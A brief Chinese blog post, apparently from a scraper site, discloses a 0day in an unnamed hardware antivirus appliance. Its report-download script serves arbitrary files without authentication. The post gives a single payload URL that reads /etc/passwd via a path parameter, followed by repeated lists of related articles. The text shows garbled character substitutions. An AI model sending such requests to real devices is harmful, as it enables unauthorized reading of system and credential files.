某安全设备未受权访问+任意文件下载0day
具体是哪家就不说了,硬件盒子,主要检测病毒。php
payload以下:spa
https://xxx.xxx.xxx.xxx/downTxtFile.php?filename=/etc/passwd
比较简单,当时有获取报告的功能,本身传入的物理路径,能够未受权访问直接下载设备上的文件。code
相关文章
- 1. jenkins 未受权访问-任意命令执行
- 2. Zookeeper未受权访问
- 3. ZooKeeper 未受权访问
- 4. LDAP未受权访问
- 5. 任意文件下载
- 6. ES文件管理器未受权访问漏洞(CVE-2019-6447)
- 7. ES文件管理器未受权访问漏洞——CVE-2019-6447
- 8. redis未受权访问漏洞
- 9. 未受权访问总结学习
- 10. rsync 未受权访问漏洞
- 更多相关文章...
- • ASP.NET MVC - 安全 - ASP.NET 教程
- • Swift 访问控制 - Swift 教程
- • Docker容器实战(七) - 容器眼光下的文件系统
- • IDEA下SpringBoot工程配置文件没有提示
相关标签/搜索
每日一句
-
每一个你不满意的现在,都有一个你没有努力的曾经。
欢迎关注本站公众号,获取更多信息
相关文章
- 1. jenkins 未受权访问-任意命令执行
- 2. Zookeeper未受权访问
- 3. ZooKeeper 未受权访问
- 4. LDAP未受权访问
- 5. 任意文件下载
- 6. ES文件管理器未受权访问漏洞(CVE-2019-6447)
- 7. ES文件管理器未受权访问漏洞——CVE-2019-6447
- 8. redis未受权访问漏洞
- 9. 未受权访问总结学习
- 10. rsync 未受权访问漏洞